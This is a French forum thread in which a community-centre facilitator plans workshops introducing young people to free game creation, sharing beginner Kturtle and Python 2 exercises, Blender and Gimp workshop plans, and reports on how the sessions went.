Il faudra plus graphique ou plus simple pour ceux-là (même moi, les fonctions Sinus et Cosinus, j'ai oublié et je n'aimais pas ça quand j'étais jeune! wink) Mais je vois la possibilité d'animation par étapes de plus en plus complexes: 1 - sous Tuxpaint, il y a un des jeux qui permet de réaliser une petite animation en faisant bouger le personnage. 2 - Sous Kturtle, on fait la même chose mais en code pour déplacer la tortue. 3 - Décomposition graphique du saut - Réalisation des images sur Gimp (ou un programme encore plus simple pour les 8-9 ans), Inkscape ou Blender. 4 - Créer un gif animé placé sur un décor (en HTML avec CSS pour le background) 5 - Afficher les images des étapes à l'aide d'une boucle (PHP ?) 6 - Présenter le langage de programmation contenu dans USF et comment ça fonctionne (moteur de jeu et tout ce que je ne connais pas encore...). 7 - Lire et tenter de comprendre une partie de code dans USF correspondant à un saut. Initiation au Python: Il y a peut-être plus simple que le saut, pour démarrer ? Voici les étapes possibles si on veut en arriver là: 1 - Faire glisser le personnage suivant un seul axe. 2 - Puis sur 2 axes (on glisse sur l'axe Y, on saute tout droit sur l'axe Z et on retombe). 3 - Ensuite, on utilise 2 images pour la marche, ou 1 pour le glissement axe Y et 1 autre pour le saut axe Z 4 - Montrer les courbes sinusoïdale d'un vrai saut dans Blender, etc... Je ne sais pas si Kturtle permet d'initier à ces courbes, mais ce serait peut-être plus simple qu'avec Python, non ? Python Je n'ai pas encore mis les mains et la tête dans Python mais je viens de prendre quelques bouquins à la bibliothèque sur le sujet. Je ne connais pour l'instant que des bribes de PHP et me contente d'essais simples (Mod'imprim ou, encore en phase test Multitours). Je n'ai meme pas encore utilisé pour mes essais une base MySQL, je vais me lancer bientôt (je connais un peu vu qu'on va parfois trafiquer directement dans notre base de donnée au boulot, pour quelques corrections). J'espère que j'y arriverai en python, et si moi j'y arrive, tout le monde peut y arriver ! tongue Faire un jeu texte avec des enfants et des ados me semble impossible dans notre EPN, Tshirtman. Les notres sont difficiles à motiver. mad Jouer, jouer, jouer, d'accord de leur côté, mais participer à une vraie animation construite et sur une certaine durée c'est beaucoup plus difficile pour notre public. sad Kturtle J'ai trouvé moi aussi de mon côté des programmes pour enfants permettant d'apprendre ou tout au moins d'aborder la programmation, basés sur le langage Logo. Kturtle a effectivement l'avantage d'être très facile à installer (dispo dans les sources de Kubuntu et d'Ubuntu). J'ai plus de mal avec Xlogo ou Tangara. C'est peut-être un point de départ avant de passer à + compliqué. Mais on m'a dit que Logo était un peu dépassé, dans le genre langage de programmation très accessible. Qu'en pensez-vous ? Problèmes d'installation Je confirme que le paquet .deb que m'a proposé Tshirtman ne veut pas s'installer avec Gdebi sur ma Ubuntu Studio Jaunty. Il y a des dépendances brisées me dit-il. J'essaierai plus tard l'autre solution, mais avec les gamins, faudra bien sûr que ce soit simple à installer, sous Linux comme sous Windows. Notez que chez nous, les gamins n'ont pas forcément Vista quand ils ont leur propre ordi car ils récupèrent souvent de vieux ordis sous XP ou pire encore. On n'en a aucun qui ait installé Linux pour l'instant, il n'y a qu'à notre EPN qu'ils le voient tourner, et le manque de jeux de haute qualité les fait tiquer. C'est justement là l'intérêt de travailler un jeu libre avec eux, en plus de chercher d'autres jeux libres plus perfectionnés peut-etre, mais moins faciles d'accès que USF pour des animations sur la programmation et/ou le design de jeux. En tout cas, ça n'empêche pas de commencer des animations avant que le jeu soit parfait et facile à installer sur toutes les plateformes et versions, puisque nous les animateurs, on peut s'embêter avec une install plus compliquée. On expliquera que pour l'installer chez eux (pour ceux qui ont un ordi), il faudra attendre un peu que les programmeurs bossent encore. Mes collègues ont été mis tout récemment sur le coup, lors d'une réunion et je leur ai envoyé les liens seulement hier, donc c'est encore jeune comme projet. Dernière modification par doudoulolita (Le 24/04/2010, à 17:09) Hors ligne tshirtman Re : Faire une animation sur la création de jeux vidéo libres bump Hors ligne doudoulolita Re : Faire une animation sur la création de jeux vidéo libres le problème c'est que l'approche de la boucle est fondamentalement fausse, elle n'a pas de sens dans la réalité d'un jeu vidéo, donc il ne faut pas la présenter à mon avis, ni toute autre solution aussi fausse, avoir expliqué le concept de la boucle de jeu permettrait normalement aux enfants d'en trouver une meilleur (ou moins fausse) directement, autant ne pas les embrouiller. Bon, je reprendrai les étapes après avoir lu un peu sur la conception de jeux et la programmation, pour ne pas faire d'erreurs. Mais dans les exemples de Kturtle, j'ai vu un truc qui me semble ressembler: initialiserépète 3 [ avance 100 tournegauche 120] Est-ce que ce n'est pas une sorte de boucle ? Dernière modification par doudoulolita (Le 24/04/2010, à 17:21) Hors ligne doudoulolita Re : Faire une animation sur la création de jeux vidéo libres Voici le code que j'ai fait lors d'un essai avec Turtle: initialise taillecanevas 300,300 couleurcanevas 125,10,125 lèvecrayon va 150,120 répète 18 { baissecrayon avance 10 lèvecrayon avance 10 tournedroite 20 } attends 1 va 20,20 écris "J'ai fait tourner la tortue" tournedroite 90 avance 200 attends 1 va 60,170 attends 1 répète 18 { baissecrayon avance 10 lèvecrayon avance 10 tournedroite 20 } va 150,250 tournegauche 90 écris "et de 2 !" tournedroite 90 avance 100 attends 1 message "C'est fini !" initialise taillecanevas 300,300 couleurcanevas 125,10,125 centre C'est dommage que l'on ne puisse pas enregistrer sous forme de gif animé et que j'aie du mal à ouvrir le fichier .turtle à partir de l'explorateur. Ce qui est super, c'est que la doc en ligne est en français et très simple à comprendre. Il y a quelques différences en fonction des versions: contrairement à ce quei est écrit sur la doc, je ne peux pas enregistrer comme page html mais comme une image en png. Mais c'est déjà sympa si on pense à supprimer les dernières lignes du code bas du code (depuis message jusqu'à centre) Hors ligne doudoulolita Re : Faire une animation sur la création de jeux vidéo libres Je viens de commencer à apprendre Python en suivant le début du livre "Initiation à la programmation avec Pyton et C++" de Yves Bailly, éditions Pearson (2008). Sur la capture d'écran ci-dessous, on voit le fichier dans l'explorateur de fichiers, l'éditeur de texte (kate) où on a écrit le programme qu'on a enregistré sous le nom python1.py et la console (toute noire toute triste, pour l'instant ) où on lance l'interpéteur python puis notre fichier python1.py par cette ligne de commande: python python1.py Le résultat s'affiche juste en dessous, dans la console, après avoir appuyé sur la touche "Entrée" du clavier. Finalement, ça commence assez facilement (d'autant que je connais déjà certains principes grâce à PHP). Il n'y a rien à installer sous Ubuntu car Python est inclus. Le résultat peut même être un peu graphique comme on le voit ici, en utilisant tirets et astérisques, entre autres signes. L'important est de bien écrire les lignes de code dans l'éditeur de texte, d'enregistrer puis de lancer la commande python python1.py dans la console + touche entrée pour voir le résultat. ENCODAGE La première ligne indique l'encodage utilisé, ici utf-8 CHAÎNE Au début, j'ai utilisé des chaines, c.à.d des suites de caractères qu'on met entre guillemets ou entre apostrophes: ex: "Bonjour, Tshirtman !" INSTRUCTION print Pour que cette chaîne s'affiche, on utilise l'instruction print print "Bonjour, Tshirtman !" VARIABLES le jeu est la première variable. On la définit par: jeu_1 = "Ultimate Smash Friends" Pour afficher le nom de jeu, je pourrai écrire: print jeu_1 Le résultat sera:Ultimate Smash Friends Si je remplace "Ultimate Smash Friends" par "Kturtle" dans la définition de la variable jeu_1, le résultat sera:Kturtle Les personnages sont les autres variables. On les définit par: perso_1 = "BiX"perso_2 = "Blob" Pour afficher le nom des 2 personnages, je pourrai écrire: print perso_1 print perso_2 Le résultat sera BiXBlob CONCATÉNATION Je peux mettre tout ça à la suite les uns des autres en utilisant le signe + print "les personnages de " + jeu_1 + " sont " + perso_1 + " et " + perso_2 résultat:les personnages de Ultimate Smash Friends sont BiX et Blob SÉPARATEUR EN TIRETS Mon programme python1.py est assez complexe car il définit aussi une fonction permettant de faire des lignes de séparation en astériques et en tirets. Je ne donnerai pas ici tous les détails, trop complexes pour démarrer. Mais voici comment réaliser une ligne composée de tirets uniquement (ou d'astérisques ou tout autre signe); c'est assez simple. Pour compliquer et parvenir à mon résultat (c'est possible, même sans définir de fonction), vous devrez réfléchir un peu ! Le principe, c'est de multiplier le tiret par le nombre de fois qu'on veut voir ce tiret apparaître. Le tiret est en fait une chaine d'1 seul caractère, donc on doit la mettre entre apostrophes au lieu de guillemets. soit: '-' Ensuite, on utilise * pour effectuer la multiplication. Puis on met un chiffre assez grand pour que la ligne de tirets soit assez longue. 80 tirets, c'est pas mal, non ? Le code sera donc: print '-'*80 Si on veut changer ce chiffre de 80 par un autre facilement, le mieux serait de le transformer en variable nommée nb_tirets EXERCICE Définissez la variable nb_tirets qui représentera le nombre de tirets composant la ligne. Imaginez la manière de coder pour faire une ligne de 20 tirets, en changeant juste la valeur de la variable. Puis faites une ligne de 20 astérisques. Puis concaténez (= aditionnez) les deux. Répétez 3 fois (on peut multiplier le code précédent par 3 en le mettant entre parenthèses). Bon codage ! Dernière modification par doudoulolita (Le 25/04/2010, à 13:39) Hors ligne doudoulolita Re : Faire une animation sur la création de jeux vidéo libres Le code est encore bien compliqué car je ne sais pas encore lister automatiquement mes personnages, mais j'utilise des fonctions définies en haut du code, que j'appelle ensuite au sein du programme. Il y a un petit problème d'encodage des accents quand je regarde ma page de code dans Firefox, mais chez moi, ça fonctionne comme il faut. Tout ça ne bouge pas beaucoup, mais le côté graphique est amené progressivement. Si on veut faire une ligne de tirets en pouvant changer ensuite le nombre, on met ce nombre comme variable: nb_tirets = 80 print '-'*nb_tirets Je rappelle que le tiret doit être mis entre apostrophes puisqu'il s'agit d'une chaine d'un seul caractère. Il suffira de changer le chiffre 80 par un autre pour avoir une ligne plus courte ou plus longue. FONCTION Mais on peut être amené à réutiliser plusieurs fois ce bout de code, en changeant à chaque fois le nombre de tirets, ce qui oblige à redéfinir la variable à chaque fois et à recopier tout ce code, pas évident ! Si on accumule plusieurs instructions pour un même objet et qu'on a besoin plusieurs fois du même bout de code, une fonction sera vraiment très utile. Le programme fera appel à elle chaque fois qu'il en aura besoin puis reviendra dans le cours normal des instructions. On va donc définir une fonction pour ce bout de code dessinant une ligne composée d'un nombre précis de tirets successifs, ce qui permettra de l'appeler ensuite quand on veut: def Tirets(nb_tirets): chaine_tirets = '-'*nb_tirets return chaine_tirets Ne pas oublier les 2 points après la parenthèse donnant l'argument de la fonction (c.à.d nb_tirets) et les tabulations avant chaine_tirets et return. Ce sont ces indentations (faites avec la touche Tab, dans Kate) qui indiquent que l'on est en train de définir la fonction. L'instruction return permet de faire un calcul, par exemple, sans l'afficher tout de suite. Quant on appelle cette fonction Tirets au sein du programme, on note entre parenthèses le nombre de tirets désiré. On doit mettre l'instruction print dans le programme avant le nom de la fonction car l'instruction return, présente dans la fonction, n'affiche rien. Cela donnera 80 tirets puis 30 tirets: print Tirets(80) print Tirets(30) SUGGÉRER UN ROCHER Un rocher est constitué du tiret vertical | (touche 6 + AltGr) au début et à la fin, et d'un nombre variable de tirets (touche 6, sans autre touche). La façon de réaliser un rocher est définie dans la fonction Rocher(nb_tirets). def Rocher(nb_tirets): chaine_tirets = '|' + '-'*nb_tirets + '|' return chaine_tirets Je rappelle de nouveau que le tiret et le tiret vertical doivent être mis entre apostrophes puisqu'il s'agit pour chacun d'une chaine d'un seul caractère. Il faudra bien sûr appeler la fonction Rocher par l'instruction print Rocher(10) ou print Rocher(5) au sein du code en indiquant le nombre de tirets désirés (dans notre exemple: 10 ou 5) comme argument. ESPACER LES ROCHERS Entre les rochers, il y a des espaces successifs appelés par la fonction Vide, avec en argument le nombre d'espaces (touche espace du clavier, tout bêtement). def Vide(nb_espace): chaine_vide = ' '*nb_espace return chaine_vide Cette fonction est même plus simple que pour réaliser un rocher ! Il faut juste penser à mettre un espace entre les apostrophes de la chaine. La 1ère ligne de rochers comprend donc des vides de taille différente et des rochers de taille différente. print Vide (3) + Rocher(5) + Vide(10) + Rocher(10) + 2*(Vide(5) + Rocher(5)) + "\n" On note que la succession d'un vide de 5 espaces et d'un rocher de 5 tirets est appelée 2 fois (en multipliant le contenu de la parenthèse par 2) comme ci-dessous: - Succession d'un vide de 5 espaces et d'un rocher de 5 tirets: print Vide(5) + Rocher(5) - La même chose appelée 2 fois: print 2*(Vide(5) + Rocher(5)) 2ème LIGNE DE ROCHERS Pour la 2ème ligne de rochers, au lieu de changer la taille des vides "à la main", j'ai additionné le chiffre avec un autre au sein de la parenthèse de la fonction Vide, ou soustrait un nombre d'espaces au premier chiffre. - 1er vide de la 1ère ligne, de 3 espaces: print Vide (3) - 1er vide de la 2ème ligne, de 3 espaces supplémentaires, soit 6 espaces: print Vide (3+3) - 2ème vide de la 1ère ligne, de 10 espaces. Note : Pour cet exemple, l'instruction print ne se met que si vous faites l'essai isolé, sinon il faut concaténer avec le symbole + la ligne de code précédente avec celle-ci : print Vide(10) - 2ème vide de la 2ème ligne, de 7 espaces en moins, soit 3 espaces restants: print Vide(10-7) Il semble logique de ne pas changer la taille des rochers. SYMBOLISER LES PERSONNAGES Au-dessus des rochers, on a fait une ligne où chaque personnage est représenté par une lettre, rappelant sa forme dans le jeu. BiX = O Blob = A Stick = I Il y a des vides appelés par la fonction Vide entre les personnages (leur lettre) et un saut de ligne noté "\n" à la fin de la ligne, code que vous avez remarqué seul dans le fichier à d'autres endroits, concaténé en fin de lignes. print Vide(5) + perso_1 + Vide(15) + perso_2 + Vide(8) + perso_3 + "\n" print "\n" Dernière modification par doudoulolita (Le 25/04/2010, à 13:27) Hors ligne psychederic Re : Faire une animation sur la création de jeux vidéo libres Si vous savez programmer , vous pouvez faire des programmes dans lequel, il n'y a plus besoin de programmer. (laissons la programmation à ceux que ca interresse des huluberlus comme nous, qui ne serons jamais la majorité de la population : point) Pourquoi pas : a la fois du mba vers lua, et du devellopement tout graphique ( comme le jeu spore par exemple et le tout avec les avantages du libre , et d'une base de donnée de ressource libre) Par exemple, dans un premier temps utiliser syntensity, ou refaire un "jeu complet" mugen like avec paintown, c'est peut être ce que cherche les gens : et c'est à leur portée. ( je note aussi qu'il manque aussi une partie scenario, que j'essairai de compléter ) http://doc.ubuntu-fr.org/developpement_de_jeux_video Hors ligne tshirtman Re : Faire une animation sur la création de jeux vidéo libres @doudoulolita: eh ben! sacré démarrage heureux de voir que je t'inspire, j'ai un peu survolé tes explications, tu semble prendre les choses dans le bon sens bonne continuation @psychedric: bizarrement les tentatives pourtant souvent réalisées par des programmeurs très compétends, de créations de langages tout graphiques, n'ont rien donné de très utilisable, en effet, exprimer la même chose avec des boutons et des graphiques qu'avec des mots clées et des suites d'ordres, s'avère être contre productif, il est vrai que la majeur partie de la population ne sera jamais développeur, mais ça ne vient pas du langage utilisé, en fait, il semble qu'on puisse aisément déterminer qui sera potentiellement programmeur et qui ne le sera pas, par un simple test, avant même d'avoir enseigné les bases… ça peut paraitre élitiste, mais c'est malheureusement le cas, enfin être formé à la programmation semble être absoluement insuffisant pour s'assurer d'être un vrai développeur… http://www.codinghorror.com/blog/archives/000635.html http://www.codinghorror.com/blog/2007/02/why-cant-programmers-program.html (et dans les deux, une bonne myriade de liens très instructifs) Hors ligne doudoulolita Re : Faire une animation sur la création de jeux vidéo libres Merci pour les liens que j'irai voir prochainement. Dans mon optique, il ne s'agit pas que tous les jeunes et toutes les personnes à qui nous proposerions une telle animation deviennent de vrais développeurs. Le but du jeu est juste d'aborder, de faire découvrir la programmation pour que les jeunes comprennent de quoi il s'agit, et qu'ils puissent voir si ça leur plaît vraiment (au cas où ils rêvent de créer des jeux vidéos). Il y a aussi la partie graphique, dans un jeu vidéo qui peut être abordée en participant au développement d'un jeu comme Ultimate Smash Friends <- Sorlo Aujourd'hui, j'ai montré Ultimate Smash Friends et mon personnage Sorlo à mon neveu qui vient tout juste d'avoir 11 ans et cela lui a donné envie d'en créer un lui aussi. Mon neveu dessine plutôt bien et à plein d'idées. Il adore utiliser ma tablette graphique et commence à s'habituer à Gimp (il a Photoshop sur Mac, chez lui, mais il n'y fait pas beaucoup d'ordi). Aujourd'hui, il a griffonné quelques croquis très sympas et il ne parvenait plus à s'arrêter tellement ses idées fusaient ! Comme quoi, un gamin motivé peut partir dans des directions très intéressantes et même s'il ne va pas jusqu'au bout dans la mise au propre, ses idées peuvent être reprises par les adultes s'il est d'accord. C'est sans doute plus complexe pour aborder la programmation, mais les petits logiciels comme Kturtle qui permettent de s'y initier sont déjà bien pour les plus jeunes, et quelques essais permettent de voir si on veut s'y coller ou pas quand on est plus âgé. L'idéal serait d'avoir à un moment un vrai développeur qui vienne faire une intervention, mais il doit être en mesure de se mettre à la portée des jeunes, ce qui n'est pas si facile. Ce qui semble évident pour un adulte peut en effet paraître totalement incompréhensible à un enfant. Même en bases informatique, on voit aussi des adultes peiner devant des choses qui nous semblent aller de soi. L'autre jour, une dame d'environ 60 ans me disait que pour elle, le clic droit ne voulait pas dire cliquer avec le bouton droit mais cliquer en allant tout droit ! Elle s'était même disputée avec son fils à ce sujet... Hors ligne doudoulolita Re : Faire une animation sur la création de jeux vidéo libres Problème pour installer Syntensity sous Ubuntu Jaunty! Je vais chercher d'autres choses, j'ai vu aussi la possibilité de faire de la programmation en python avec Blender. Mais je dois bien sûr trouver quelque chose de simple en vue de mon projet d'animation. Hors ligne doudoulolita Re : Faire une animation sur la création de jeux vidéo libres Pour MyPaint, on ne peut pas installer le paquet mypaint comme indiqué dans les pré-requis de la doc d'Ubuntu (lien mort et pas trouvé dans les dépots) Une fois l'install' effectuée, il s'ouvre mais me signale une erreur de programmation. Je ferme cette fenêtre, histoire de lui clouer le bec, et j'essaie de dessiner un peu mais la fenêtre d'erreur revient toutes les 10 secondes... Hors ligne doudoulolita Re : Faire une animation sur la création de jeux vidéo libres En langage python, pour que le joueur puisse entrer une donnée, voici le code à taper dans un simple éditeur de texte : print "Joueur n°1, tapez votre pseudo: ", pseudo1 = raw_input() print "Bienvenue à", pseudo1, "dans Ultimate Smash Friends, vous êtes le joueur n° 1 !" L'instruction print permet l'affichage de la chaîne de caractère de la 1ère ligne. On se rappelle que ces chaines sont mises entre guillemets. raw_input() permettra d'entrer la donnée pseudo1 dans le programme pour l'utiliser par la suite. Nous l'afficherons dans une phrase grâce à la 3ème ligne. Celle-ci insèrera cette donnée pseudo1 entre 2 chaines de caractères (toujours entre guillemets, souvenez-vous !). La virgule derrière la question, dans le code, permet que votre réponse reste sur la même ligne que la question. Idem pour les virgules avant et après pseudo1 Enregistrez sous le nom de progpseudo.py dans un dossier nommé programmes. Remplacez par le nom de votre propre programme et de votre propre dossier s'il est différent, bien sûr Ouvrez la console (Konsole ou Terminal). Placez vous dans le bon dossier grâce à la commande cd suivie du chemin du dossier (change directory = changer de répertoire). Ex: cd /home/laurence/programmes Tapez sur la touche Entrée du clavier pour entrer dans le répertoire demandé. Ecrivez ce code à la suite dans la console pour appeler votre super programme: python progpseudo.py Tapez sur la touche Entrée pour lancer le programme. La console affiche alors la 1ère ligne, à laquelle vous devez répondre. Répondez puis validez avec la touche Entrée. La console affichera ensuite votre réponse à l'intérieur de la phrase appelée par la 3ème ligne de code. Cette image montre à la fois le code écrit dans l'éditeur de texte et le résultat dans la console. N'oubliez pas que je n'ai tapé mon nom qu'une fois dans la console et nulle part dans le code ! Si vous copiez-collez ces 3 lignes de codes en dessous des précédentes et que vous remplacez le chiffre 1 par le chiffre 2, vous pourrez aussi demander son pseudo au joueur n°2 et l'afficher pareillement. Essayez ! Demandez ensuite le prénom des 2 joueurs puis arrangez-vous pour l'afficher dans une phrase du type:Le pseudo de Laurence est Doudoulolita tandis que le surnom de Jean est Patouille. N'hésitez pas à inventer d'autres questions et d'autres phrases pour vous amuser. Dernière modification par doudoulolita (Le 18/05/2010, à 00:40) Hors ligne doudoulolita Re : Faire une animation sur la création de jeux vidéo libres print "Joueur n°1, combien de points de vie avez-vous ?", nb_points1 = int(raw_input()) print "Joueur n°2, combien de points de vie avez-vous ?", nb_points2 = int(raw_input()) print "Au début du jeu,", pseudo1, "a", nb_points1, "points de vie,", pseudo2, "en a", nb_points2, "." print "Il y a", \ nb_points1 + nb_points2, \ "points de vie en tout." int(raw_input()) permet d'entrer un chiffre que l'on pourra réutiliser dans un calcul, comme ici avec nb_points1 + nb_points2. Notez qu'il y a 2 parenthèses fermantes à la fin, une pour fermer raw_input, une pour fermer int. Mais n'oubliez pas d'ouvrir les parenthèses avant de les fermer ! On note les \ avant et après le calcul, et les espaces pour indenter les 2 dernières lignes (c'est à dire les décaler vers la droite). Ne pas utiliser la touche Tabulation car il me semble que ça pose problème. Le programme suivant se base sur cet exemple mais l'addition (ici: 5+6 = 11) est placée avant le nombre de points de chaque joueur. Il réutilise aussi le code appris précédemment. Cliquez sur l'image de la console pour voir le code utilisé (écrit dans l'éditeur de texte, donc) Bon, dans un jeu, on ne choisit pas soi-même ses points de vie, mais vous pouvez prendre un dé pour décider de votre réponse ! Quant au nombre de joueurs, si vous le choisissez plus élevé que le nombre choisi par le programmeur pour l'instant (ici je n'en ai prévu que 2...), vous n'aurez pas de questions pour les joueurs 3, 4, etc. A vous de coder pour prévoir 4 joueurs, comme dans le vrai jeu d'Ultimate Smash Friends ! Dernière modification par doudoulolita (Le 20/07/2010, à 19:02) Hors ligne arturototo Re : Faire une animation sur la création de jeux vidéo libres aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaj'y voit plus claire maintenant mercie!!!!!! Artur MOUKHAMEDOV (11 ans) Hors ligne arturototo Re : Faire une animation sur la création de jeux vidéo libres je comprend bien mieu Artur MOUKHAMEDOV (11 ans) Hors ligne tshirtman Re : Faire une animation sur la création de jeux vidéo libres lol, t'as le même avatar que Kanor, je t'ai pris pour lui au début, comme il fait aussi du python ^^, mais ça m'étonnait qu'il ait appris un truc juste là . Hors ligne doudoulolita Re : Faire une animation sur la création de jeux vidéo libres Mon premier atelier sera sur Blender les 19 et 20 juillet de 14 à 16h à l'Espace libre 13.1. Au programme: création d'une petite barque et intégration dans un fond en vue de créer un décor pour le jeu Ultimate Smash Friends. Deuxième atelier sur la programmation python (B.A.BA) les 22 et 23 juillet de 14 à 16h. Un mini-script python pour Blender trouvé sur Internet complétera quelques exercices en mode texte. Dernière modification par doudoulolita (Le 12/07/2010, à 13:47) Hors ligne doudoulolita Re : Faire une animation sur la création de jeux vidéo libres Voici une idée de ce que je souhaite réaliser avec les participants à mon atelier Blender du 19 et 20 juillet 2010 (pour adultes et jeunes à partir de 15 ans): Les participants réaliseront une barque sur Blender. Elle est modélisée avec des extrusions, le modificateur Miroir et des redimensionnements utilisant le PET (Outil d'Edition Proportionnelle). Il faudra placer lampe et caméra pour voir la barque de profil. On apprend aussi à utiliser le mode points, le mode arêtes et le mode faces, ainsi que l'outil Couteau (K), et à choisir un rendu en png avec un fond transparent (RGBA). Enfin, on ajoute à la barque un matériau marron et une texture bois. Puis, si on a le temps, les participants insèreront l'image rendue en plusieurs exemplaires avec Gimp sur une image de fond (trouvée sur internet). Ils ajouteront le personnage Sorlo pour se donner une idée de la taille que doit avoir la barque. On utilisera donc l'outil de recadrage, les calques et l'outil de redimensionnement. L'image de fond provient de http://commons.wikimedia.org/wiki/File: … rfeurs.jpg Dernière modification par doudoulolita (Le 12/07/2010, à 13:56) Hors ligne tshirtman Re : Faire une animation sur la création de jeux vidéo libres Oula, l'idée est intéressante mais assez perturbante du point de vue perspective ^^. Hors ligne doudoulolita Re : Faire une animation sur la création de jeux vidéo libres Comme je l'ai marqué sur l'autre topic sur USF, je n'ai pas eu grand monde à mon animation. Sur les 5/6 inscrits, seulement 2 se sont présentés, un jeune de 15 ans gentil mais qui croit que ça lui sera facile de devenir testeur de jeux, et un adulte qui s'intéressait en fait à la retouche photo sur Gimp. Le jeune a quand même commencé un petit iceberg en vue d'en faire un élement de décor pour USF, avec Blender; ma barque ne le motivait pas beaucoup (et pourtant, sur le plan didactique, il y avait plus à apprendre !) Pour une animation de 2x2h, on ne peut de toute façon pas faire un truc très travaillé. Je voulais surtout leur apprendre à modéliser et texturer la barque et j'ai un peu vite fait l'insertion sur le fond, sans trop me prendre la tête dessus, j'avoue ! L'idéal serait en fait de "fabriquer la mer" avec Blender ou en tout cas de mieux placer les barques sous la camera pour avoir une perspective correcte, effectivement (mais comment placer des repères fiables ?). Il faudrait aussi mettre quelques vagues en bas des barques pour les faire flotter en utilisant une copie du calque et un masque de calque. Mais travailler sur un décor "à plat" (et non un truc en hauteur) n'était peut-être la meilleure idée pour un décor de jeu 2D. Le jeune qui a fait l'iceberg pendant l'animation voudra sans doute faire aussi la mer avec Blender ou avec Gimp et là, je dois dire que je n'ai pas encore étudié la question de la profondeur. On se retrouvera aussi avec un problème de perpective. En fait, la question que je me posais avant de concevoir cette animation, c'était de savoir si je choisissais le thème du décor et que je l'imposais à tous (plus facile avec un groupe de personnes au-delà de 4 ou 5) ou si je partais des idées des participants, ce qui implique qu'ils se mettent d'accord et pour moi, de m'adapter à un truc qu'on n'a pas testé avant. Dans l'un comme l'autre cas, j'ai fait une erreur en oubliant un des principes de base du jeu, qui fonctionne en 2D et dont le décor doit se travailler sur l'axe Z de Blender ! J'espère avoir un peu de monde Jeudi et vendredi pour la programmation, mais si besoin, je m'adapterai aux personnes présentes. De toute façon, la préparation de ces ateliers m'a permis d'acquérir des petites bases sur Python et j'ai même fait un essai de Pygame grâce à des tutos sur le web, donc ce n'est pas du temps perdu. Je me suis aussi acheté le bouquin "The blender Gamekit", en anglais. A suivre... Dernière modification par doudoulolita (Le 20/07/2010, à 18:56) Hors ligne doudoulolita Re : Faire une animation sur la création de jeux vidéo libres Je me suis amusée à faire encore d'autres petits essais en python en mode texte mais je voulais passer au côté graphique. Dans le livre "Initiation à la programmation" d'Yves Bailly, qui m'a servi de base, les exemples sont donnés avec la bibliothèque Qt. J'ai trouvé des tutos intéressants pour python avec Pygame (en anglais) J'ai suivi les 2 premiers tutos, très simples, de pygame-tutorial et un autre pour apprendre à incorporer une image . Mon code n'est pas super mais ça affiche quelque chose ! Je suppose qu'une fonction pour les rectangles serait bien ou même peut-être existe-t-il quelque chose de "tout fait" dans Pygame. Les chiffres entre parenthèses indiquent d'abord la couleur de la ligne en mode RVB, puis les coordonnées des points de début et de fin (en pixels). Pour trouver les codes de couleurs, choisir une couleur dans le sélecteur de couleur de Gimp et noter les chiffres R,V et B indiqués sur la droite du sélecteur de couleur. Ce que le livre d'Yves Bailly m'a fait comprendre, c'est que pour créer un jeu en python, par ex., il faut d'abord exprimer clairement les choses et définir objets et actions du jeu (en français, tout bêtement !). En les exprimant clairement et de manière détaillée, on voit plus rapidement comment travailler et structurer le code qu'on fera par la suite. Un simple mouvement d'un des éléments du décor nécessite de définir les coordonnées de cet objet, de définir ses modalités de déplacement, d'indiquer ce qui provoque ce déplacement (touche de clavier, par ex); le fait qu'il ait une certaine vitesse implique le temps, et donc peut-être un chronomètre, etc! Dernière modification par doudoulolita (Le 20/07/2010, à 19:16) Hors ligne tshirtman Re : Faire une animation sur la création de jeux vidéo libres Ce que le livre d'Yves Bailly m'a fait comprendre, c'est que pour créer un jeu en python, par ex., il faut d'abord exprimer clairement les choses et définir objets et actions du jeu (en français, tout bêtement !). En les exprimant clairement et de manière détaillée, on voit plus rapidement comment travailler et structurer le code qu'on fera par la suite. tout à fait, c'est vrai pour tout type de programmes, et les jeux ne font pas exceptions, mieux on sait ce qu'on veux faire (et ce n'est pas facile) plus on a de chance de le faire correctement! un jeune de 15 ans gentil mais qui croit que ça lui sera facile de devenir testeur de jeux, c'est facile, sauf si tu veux que ce soit un vrai métier… Dernière modification par tshirtman (Le 20/07/2010, à 19:34) Hors ligne doudoulolita Re : Faire une animation sur la création de jeux vidéo libres Pour un jeune, je pense que les logiciels libres et en particulier les jeux libres leur offrent une chance formidable de s'entraîner et de vérifier leur motivation au cas où ils souhaiteraient faire de leur passion un métier. Tester, développer, c'est quand même plus facile dans ce cadre qu'au sein d'une entreprise très fermée, non ? Le problème de certains ados, c'est qu'ils pensent que pour être testeur, il suffit juste de jouer et que ce sera des jeux qui les passionnent alors qu'un simple tour sur les forums au sujet de ce métier (ou de cette activité, si on préfère) montre le contraire. Mais que les ados rêvent, c'est normal. Après, s'ils veulent vraiment réaliser leur rêve, il leur faudra se confronter à la réalité et prouver leur motivation pour pouvoir vivre de leur passion. Je dis ça alors qu'ado, je rêvais d'être styliste chez Jean-Paul Gaultier, et que je me suis retrouvée quelques années plus tard simple patronnière dans le Sentier (ceux qui connaissent Paris savent dans quelles conditions on y travaille le plus souvent)... Hors ligne doudoulolita Re : Faire une animation sur la création de jeux vidéo libres J'ai oublié de dire ici que je n'ai pas eu beaucoup plus de monde pour l'atelier programmation. Un adulte qui pensait qu'il s'agissait de faire des bases de données (et dans son cas, un simple tableur comme calc devait lui suffire, à mon avis), le jeune qui était là pour Blender et deux autres plus jeunes encore. Les jeunes ont eu du mal à s'intéresser à Ultimate Smash Friends et à python ! Celui de 15 ans m'a montré RPG maker dont pour ma part je ne raffole pas mais qui a amusé les autres pour créer des décors très facilement. Le côté programmation des persos sur RPGmaker n'est pas si évident que ça en a l'air, j'ai eu ensuite du mal à reproduire ce que m'avait montré le jeune, qui pourtant semblait super simple. Ce que je n'aime pas dans ce programme, c'est le côté "déjà tout fait" que les jeunes, eux, aiment beaucoup. Ce qui est plutôt pratique, c'est la simplicité de création des décors qui peut plaire aux plus jeunes pour les amener ensuite vers plus de programmation avec les personnages. Je ne sais pas si ce type de jeu permettant de créer un jeu existe en logiciel libre et a ce côté facile et convivial 